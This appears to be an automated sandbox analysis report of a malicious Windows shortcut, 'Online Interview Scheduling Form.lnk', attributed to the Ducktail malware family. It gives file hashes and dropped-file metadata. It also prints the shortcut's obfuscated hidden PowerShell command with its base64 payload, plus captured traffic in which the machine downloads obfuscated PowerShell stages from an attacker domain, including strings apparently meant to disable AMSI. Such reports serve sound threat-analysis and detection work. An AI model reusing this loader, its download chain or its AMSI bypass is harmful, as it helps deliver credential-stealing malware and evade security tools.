	4YgQ2xN41W.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse
	EERNI7eIS7.lnk	Get hash	malicious	Ducktail	Browse
	cOOhDuNWt7.lnk	Get hash	malicious	Ducktail	Browse
	O5PR3i6ILA.lnk	Get hash	malicious	Ducktail	Browse
	SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk	Get hash	malicious	Ducktail	Browse
	aQuwmiym51.lnk	Get hash	malicious	Ducktail	Browse
	gW6FHWNFzR.lnk	Get hash	malicious	Ducktail	Browse

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8306898189249221
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugr:gJjJGtpTq2yv1AuNZRY3diu8iBVqFt
MD5:	5150F8EAC9CC528DEA16F08CDAD3393A
SHA1:	667875421F0F14AF42290263FD93C746675F9F20
SHA-256:	BB7084EA589AF5E0D108962AF403165F895A2699AE2615B04D5A76CD5F99BAD4
SHA-512:	ED8771CE56217A71B04422FD0FDD38284249842B5C7BA0659658A4D4ED5EB1C0E65F710605857CCBA839E435030ADE171BF4CE6304F3635884C77A859793B603
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20010
Entropy (8bit):	5.02587298723976
Encrypted:	false
SSDEEP:	384:KiQ0HzAFsIXX359ib4DVVHWrxpUUpXoCwiopbjvwRjdvRlYfWkib45OvQJvOjJx:KinHzwZH3FVVHWrxpUUpXoCwiopbjoRd
MD5:	C186375FF05EC8290B95774491023DB5
SHA1:	82A941D25468A2540ECF7ADC112B3D03A736D177
SHA-256:	0905F6ADB88C134603DB8DB937B313400EB37929BF8D047103DA014DD479E6D7
SHA-512:	ABDB485D2B5023DA2E2C32A4CA7CF9B74B6F9851B456E9417C2E820275F727C5680095C3E47CEFCFF2CEADF2982659F70D0F42D792D47653CA776222627383E1
Malicious:	false
Preview:	PSMODULECACHE......wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Get-Date........Clear-Variable........Get-EventSubscriber........Import-Csv........Get-Variable........New-Variable........Compare-Object........New-TemporaryFile........Convert-String........New-Alias........Export-Csv........Get-Event........Set-TraceSource........ConvertTo-Csv........ConvertFrom-Json........Get-PSCallStack........

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 15 01:46:49 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.985340411815393
Encrypted:	false
SSDEEP:	24:Ham9p9EsL/mHwwKqxmNII+ycuZhN9akS7PNnqSSd:tSsDm/Kqxmu1ul9a3xqSC
MD5:	541BE0305085403921D7CB7C3355DE75
SHA1:	9381D7A1A36791C71984CCE1D9FD63CA74E55495
SHA-256:	94679A0D5A04921DE64B37427CF071A13336FD77B682125E65866D3EDE3B2D4B
SHA-512:	0D631754EAC62064BAE94418B0642B26F382249785E7881973BEBECDDC1F355333253C71F37FD9103D45D9BC2747CC70258508D73035BBAAD55682E1C3D3ED64
Malicious:	false
Preview:	L.....6g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\lsozgnau\CSCDC8C4E3F93914FB7BA165C9B4C26D24F.TMP..................N.!...J..x.>{.............5.......C:\Users\user\AppData\Local\Temp\RES4DCB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.s.o.z.g.n.a.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

File type:	MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=340, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Entropy (8bit):	0.0011876394077408015
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	Online Interview Scheduling Form.lnk
File size:	31'457'280 bytes
MD5:	c29d629ec1db6e91d1bc4bec2e19d42a
SHA1:	ea967f69a5ac4621f24bebf33f640768915eba68
SHA256:	22f42cc0ca736ea1b9dda6416462f739a0db44297fa6a390365f36dc23f58a58
SHA512:	5abc2c44935524682e1d64f854273732d753fcb38dacd7c73f0cd622f9ddf6bb4f80cafc69b5d9becde4e10aca4bc96924d1fae8908786f36f5acfe77ec706b1
SSDEEP:	96:8qV8rlMvomw/63YqIz2lE5hgcZFLWB6j0gxFwQdL2gEmeflwOh:8qV8rlMvomKBLhFBdefWO
TLSH:	4C67DE1269E710C9F16B57701FD8F8FF4B79E4122A2EB5B52100D345CB35B88CA62AB5
File Content Preview:	L..................F.B..................................T........................./.v. ./.k. .".S.t.^.a.r.t. ./.m.I.n. .".". .p.o.w.^.e.r.^.S.^.H.^.E.l.l. . .-.n.^.O.l.^.o.^.g.o. .-.N.O.^.P. .-.e.^.p. .B.^.y.^.P.^.a.s.s. .-.E.N.^.C.O.^.D.e.^.d.^.c.O.M.^.M

General
Relative Path:
Command Line Argument:	/v /k "St^art /mIn "" pow^er^S^H^Ell -n^Ol^o^go -NO^P -e^p B^y^P^ass -EN^CO^De^d^cOM^MA^nd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEcAOABBAFoAQQBCAEoAQQBFADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcANABBAFkAZwBCAFkAQQBGAEkAQQBhAEEAQgBhAEEARABJAEEAVgBnAEIAMQBBAEYAawBBAE0AdwBCAHIAQQBIAFUAQQBZAGcAQQB5AEEARABVAEEAYwB3AEIAaABBAEYAYwBBAE4AUQBCAHMAQQBFAHcAQQBlAGcAQgBDAEEARQBVAEEAWQBRAEEAegBBAEcAOABBAE0AdwBCAGkAQQBHAGMAQQBQAFEAQQA5AEEAQwBJAEEASwBRAEEAcABBAEMAawBBAEsAUQBBAHUAQQBFAE0AQQBUAHcAQgBPAEEASABRAEEAWgBRAEIATwBBAEgAUQBBAEsAUQBBAHAAQQBBAD0APQAiAA=="" && exit
Icon location:	%SystemRoot%\System32\imageres.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 01:00:45.533919096 CET	57907	53	192.168.2.5	1.1.1.1
Nov 15, 2024 01:00:46.194292068 CET	53	57907	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 01:01:41.464457989 CET	75	OUT	GET /api/check HTTP/1.1 Host: gmtagency.online Connection: Keep-Alive
Nov 15, 2024 01:01:42.372975111 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axHHBAm9wzNBAovRdktkhgUSYPsHV8VNMDekA9pYDNHYCAo9Ywxqx%2Fo3r8bVwkfM6darGEfagrzfM1l5%2FWVObwwsHvvSikQmVGzNzygqiEby3VHQ8kDA9UkTZ6CbxPCRxHVMZCQM4K5r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16519&sent=66264&recv=33030&lost=0&retrans=0&sent_bytes=92898812&recv_bytes=1489006&delivery_rate=47676659&cwnd=286&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 vary: accept-encoding Server: cloudflare CF-RAY: 8e2af7dd9d862ca8-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1078&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=75&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 36 33 0d 0a 31 37 33 31 36 32 38 39 30 32 7c 72 77 4d 48 68 4a 6a 48 51 69 6c 48 61 39 7a 6d 79 54 42 45 37 72 4e 44 50 61 36 31 6b 39 57 64 6e 6b 35 65 57 53 69 63 77 74 34 49 39 63 48 2b 35 6b 66 47 38 41 74 42 32 6d 49 53 55 54 6f 33 6d 79 4f 36 32 63 62 70 4a 30 73 6e 39 4d 47 75 4e 6c 41 52 5a 66 32 57 72 4c 4e 57 4a 63 39 77 42 61 30 52 73 36 71 2f 4e 33 43 38 47 4b 2b 2f 52 70 68 44 36 34 4e 38 6d 71 42 41 48 31 43 6f 35 35 30 72 57 56 65 65 6a 76 77 78 31 51 72 42 31 36 6e 4e 5a 6f 4f 57 33 4c 76 37 4b 79 4f 34 47 45 73 6d 37 35 62 6e 5a 38 30 4d 74 69 Data Ascii: 1631731628902\|rwMHhJjHQilHa9zmyTBE7rNDPa61k9Wdnk5eWSicwt4I9cH+5kfG8AtB2mISUTo3myO62cbpJ0sn9MGuNlARZf2WrLNWJc9wBa0Rs6q/N3C8GK+/RphD64N8mqBAH1Co550rWVeejvwx1QrB16nNZoOW3Lv7KyO4GEsm75bnZ80Mti
Nov 15, 2024 01:01:42.373039961 CET	172	IN	Data Raw: 66 66 66 4f 50 31 5a 32 79 50 6d 2b 5a 68 67 67 62 6a 33 57 61 6f 75 47 65 47 77 70 79 31 58 58 63 5a 2b 66 73 73 50 2b 72 33 6e 63 76 6e 43 63 41 6d 58 58 65 69 4e 65 76 6a 33 7a 47 73 58 7a 79 4e 63 43 4d 41 31 79 2f 65 6b 48 79 38 2b 47 77 43 Data Ascii: fffOP1Z2yPm+Zhggbj3WaouGeGwpy1XXcZ+fssP+r3ncvnCcAmXXeiNevj3zGsXzyNcCMA1y/ekHy8+GwCyqIXrtnH6Nuhogp09HJi2Qm6GUMZPwLW7tQky8/W2OlnZpmW8vq56LMpSOjPfegD29SgUp7jq7GUPU6W1H3O9g==
Nov 15, 2024 01:01:42.373070002 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:46 UTC	167	OUT	GET /0Dkz7n HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Connection: Keep-Alive
2024-11-15 00:00:47 UTC	991	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:00:47 GMT Content-Type: application/octet-stream Content-Length: 6441 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v9CGCuU8TuIPETKSMpAzTyDX7v7Zh4%2FayuBerAGrTAi3ryUr%2Bd63vYwOuuLMRXJ4NakqcqwXUvMFCOwxkrrGE52T%2Bp%2BwCrTxLCjzTnWmp57zdj6irpdwgUGSm6sh04Z8RIfKBr8K6Q2w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24532&sent=41486&recv=21660&lost=0&retrans=35&sent_bytes=57342060&recv_bytes=1387958&delivery_rate=49991580&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af685cc1f51f7-DEN server-timing: cfL4;desc="?proto=TCP&rtt=18794&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=781&delivery_rate=154083&cwnd=32&unsent_bytes=0&cid=6f1cf046ed60e48a&ts=686&x=0"
2024-11-15 00:00:47 UTC	378	IN	Data Raw: 24 76 6b 6f 78 61 71 6e 6b 78 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 6d 68 56 4d 31 4a 35 59 56 63 31 62 6b 74 44 53 6a 46 69 62 58 52 31 59 6a 4e 6b 64 55 39 70 53 57 64 4c 65 55 46 72 57 48 6b 31 52 6d 56 48 54 6d 78 6a 53 46 4a 77 59 6a 49 30 64 56 52 58 56 6e 70 6a 4d 6b 5a 75 57 6c 4e 72 5a 32 5a 55 63 30 35 44 61 56 49 77 53 55 51 77 5a 30 74 46 5a 47 78 6b 51 7a 46 45 59 56 63 78 53 6d 4a 75 54 6a 42 5a 56 7a 56 71 57 6c 4e 43 57 47 46 58 4e 48 70 4e 62 44 6c 52 59 55 68 73 65 6d 46 58 54 6d 68 69 52 54 46 73 59 6c 63 35 65 57 56 54 51 6a 68 4a 52 54 46 73 Data Ascii: $vkoxaqnkx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UmhVM1J5YVc1bktDSjFibXR1YjNkdU9pSWdLeUFrWHk1RmVHTmxjSFJwYjI0dVRXVnpjMkZuWlNrZ2ZUc05DaVIwSUQwZ0tFZGxkQzFEYVcxSmJuTjBZVzVqWlNCWGFXNHpNbDlRYUhsemFXTmhiRTFsYlc5eWVTQjhJRTFs
2024-11-15 00:00:47 UTC	1369	IN	Data Raw: 50 62 45 4a 35 59 6a 4a 4f 62 47 4d 7a 54 6e 5a 6a 61 30 35 32 5a 46 63 31 4d 45 39 33 4d 45 74 4b 52 31 46 6e 55 46 4e 42 62 31 49 79 56 6a 42 4d 56 6b 4a 35 59 6a 4a 4f 62 47 4d 7a 54 57 64 6d 51 30 4a 4f 57 6c 64 47 65 6d 52 59 53 6d 78 4d 56 54 6c 70 59 57 31 57 61 6d 52 44 61 33 56 52 4d 6a 6b 78 59 6d 35 52 4e 30 52 52 62 32 74 61 55 30 45 35 53 55 5a 30 56 47 56 59 54 6a 42 61 56 7a 42 31 56 6c 68 4b 63 46 68 55 62 7a 5a 53 57 45 35 71 57 56 68 43 62 46 4a 48 52 6a 42 5a 56 6b 34 77 59 32 31 73 64 56 70 35 61 47 4a 53 56 7a 55 79 59 56 68 4b 64 6d 4a 74 4d 57 78 69 62 6c 4a 6b 54 32 70 77 56 6d 4d 79 56 6e 6c 55 62 55 5a 30 57 6c 4e 72 4e 30 52 52 62 32 74 6b 57 45 70 7a 53 55 51 77 5a 30 6c 74 61 44 42 6b 53 45 4a 36 54 32 6b 34 64 6c 6f 79 4d 54 Data Ascii: PbEJ5YjJObGMzTnZja052ZFc1ME93MEtKR1FnUFNBb1IyVjBMVkJ5YjJObGMzTWdmQ0JOWldGemRYSmxMVTlpYW1WamRDa3VRMjkxYm5RN0RRb2taU0E5SUZ0VGVYTjBaVzB1VlhKcFhUbzZSWE5qWVhCbFJHRjBZVk4wY21sdVp5aGJSVzUyYVhKdmJtMWxiblJkT2pwVmMyVnlUbUZ0WlNrN0RRb2tkWEpzSUQwZ0ltaDBkSEJ6T2k4dloyMT
2024-11-15 00:00:47 UTC	1369	IN	Data Raw: 4e 6c 5a 57 55 6b 64 50 51 7a 56 49 57 6c 68 53 56 47 52 49 53 6e 42 69 62 57 4e 76 53 6b 64 4b 4e 57 52 48 56 6b 4a 6a 62 6b 70 6f 5a 56 4e 72 63 45 52 52 62 7a 30 3d 22 29 29 3b 0a 24 75 6f 70 6b 6b 76 68 72 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 53 6b 64 46 5a 31 42 54 51 57 6c 6b 56 7a 56 79 59 6d 30 35 4d 32 4a 70 53 54 64 4a 51 54 42 4c 5a 45 68 4b 4e 55 6c 49 63 32 64 4b 52 30 56 6e 55 46 4e 43 59 6c 55 7a 62 48 70 6b 52 31 5a 30 54 47 78 57 65 57 46 57 4d 44 5a 50 61 31 5a 36 57 54 4a 47 64 31 70 56 55 6d 68 6b 52 30 5a 55 5a 45 68 4b 63 47 4a 74 59 32 39 4c Data Ascii: NlZWUkdPQzVIWlhSVGRISnBibWNvSkdKNWRHVkJjbkpoZVNrcERRbz0="));$uopkkvhr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdFZ1BTQWlkVzVyYm05M2JpSTdJQTBLZEhKNUlIc2dKR0VnUFNCYlUzbHpkR1Z0TGxWeWFWMDZPa1Z6WTJGd1pVUmhkR0ZUZEhKcGJtY29L
2024-11-15 00:00:47 UTC	1369	IN	Data Raw: 4d 7a 55 6d 78 69 55 7a 56 54 5a 46 63 31 4d 47 46 58 4d 57 78 4d 61 32 78 31 5a 45 64 57 65 57 49 7a 51 6c 52 61 57 45 6f 79 59 56 64 4f 62 47 4e 36 63 32 64 6a 53 46 5a 70 59 6b 64 73 61 6b 6c 48 54 6e 4e 5a 57 45 35 36 53 55 5a 6b 63 47 4a 71 54 58 6c 4a 53 48 4e 6e 56 7a 42 53 63 32 4a 46 62 48 52 6a 52 7a 6c 35 5a 45 4e 6e 61 57 51 3d 22 29 29 3b 0a 24 71 61 70 73 76 63 6d 61 76 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 6c 42 31 59 6d 78 70 59 79 78 54 64 47 46 30 61 57 4d 3d 22 29 29 3b 0a 24 62 68 6d 74 6f 71 75 77 61 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e Data Ascii: MzUmxiUzVTZFc1MGFXMWxMa2x1ZEdWeWIzQlRaWEoyYVdObGN6c2djSFZpYkdsaklHTnNZWE56SUZkcGJqTXlJSHNnVzBSc2JFbHRjRzl5ZENnaWQ="));$qapsvcmav=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("blB1YmxpYyxTdGF0aWM="));$bhmtoquwa=[System.Text.
2024-11-15 00:00:47 UTC	515	IN	Data Raw: 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 47 55 3d 22 29 29 3b 0a 24 68 6b 63 73 74 77 62 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 53 35 44 62 33 4a 6c 22 29 29 3b 0a 24 62 6f 77 6e 73 78 68 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 47 55 3d 22 29 29 3b 0a 24 65 65 79 74 67 78 77 Data Ascii: g([System.Convert]::FromBase64String("U3lzdGU="));$hkcstwb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bS5Db3Jl"));$bownsxh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGU="));$eeytgxw
2024-11-15 00:00:47 UTC	1369	IN	Data Raw: 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 61 55 6c 75 61 58 52 47 59 57 6c 73 5a 57 51 3d 22 29 29 3b 0a 24 70 62 6d 72 73 64 6d 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 57 31 7a 22 29 29 3b 0a 24 6b 77 6b 62 62 7a 6f 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 53 35 4e 59 57 35 68 5a 32 56 74 5a 57 35 30 4c 6b 46 31 64 47 39 74 59 58 52 70 62 32 34 75 Data Ascii: rt]::FromBase64String("aUluaXRGYWlsZWQ="));$pbmrsdm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW1z"));$kwkbbzo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bS5NYW5hZ2VtZW50LkF1dG9tYXRpb24u
2024-11-15 00:00:47 UTC	72	IN	Data Raw: 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 28 24 75 6f 70 6b 6b 76 68 72 20 2b 20 24 76 6b 6f 78 61 71 6e 6b 78 29 29 29 29 3b 0a Data Ascii: tString([System.Convert]::FromBase64String(($uopkkvhr + $vkoxaqnkx))));

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:50 UTC	369	OUT	GET /file3/77bd1c037f735ab3a82a0b38c9abbc302a447e1b0cdcb740bb8ed41e8bc1e28fe55f5292ac48064cc9f6b0f0207f961cf888ab6d838c88b93e528dcb49285dc5d3868388891d022d7c4d5917e79efb77320897b36777029f8dbedbda7d9256fa/Windows%20Defender/4/4/user/196 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online
2024-11-15 00:00:50 UTC	1072	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:00:50 GMT Content-Type: application/octet-stream Content-Length: 2872 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cg5v6i%2BESf%2BnBvIuPM5AbM4YZjnx7sulmqGvJw12Prti1bslaXFDP0rHJt7m0L9ZFfc3Pp8mgLhZ%2FScErMTAh2e08k21lxjJ1lQJe%2FrQ37aMt%2F%2FDJfQWPO7bS%2Br%2BP2ucv9ACtl8L3ATR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27596&sent=60450&recv=30311&lost=0&retrans=0&sent_bytes=84534764&recv_bytes=1454593&delivery_rate=40500340&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af69bef815202-DEN server-timing: cfL4;desc="?proto=TCP&rtt=19233&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1007&delivery_rate=148170&cwnd=32&unsent_bytes=0&cid=089e4f15a2f42aa6&ts=473&x=0"
